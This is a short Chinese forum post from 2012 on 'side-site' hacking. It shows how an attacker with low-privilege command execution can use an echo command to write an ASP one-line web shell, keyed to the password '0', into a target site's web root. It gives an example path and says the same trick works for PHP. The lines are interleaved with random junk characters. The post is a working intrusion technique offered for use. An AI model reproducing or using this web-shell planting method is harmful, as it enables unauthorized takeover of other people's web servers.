在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
/ ?* P7 z2 U" u7 w! m* m' p# G7 L
命令格式0 i4 a3 q( l+ g" ~3 j) O7 Y. h# v
: Y7 Y% w3 J4 u; R, L7 ]/ YEcho 语句 >目标站绝对目录
7 Z! d9 j7 k" E$ N$ ~
+ {8 g( b3 s2 ~$ ? D7 l例如: * N; [, Z$ l+ v3 H& }, m# v/ |
. t4 U/ l9 G' |: f- |echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
$ W# i1 Z1 }7 H" _4 K" E& H
9 N" j0 L$ X2 A( a: y- }这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。& M/ N, n7 U+ I4 u+ M g0 a6 _* l* Z
|
发表于 2012-9-23 14:40:24
收藏
支持
反对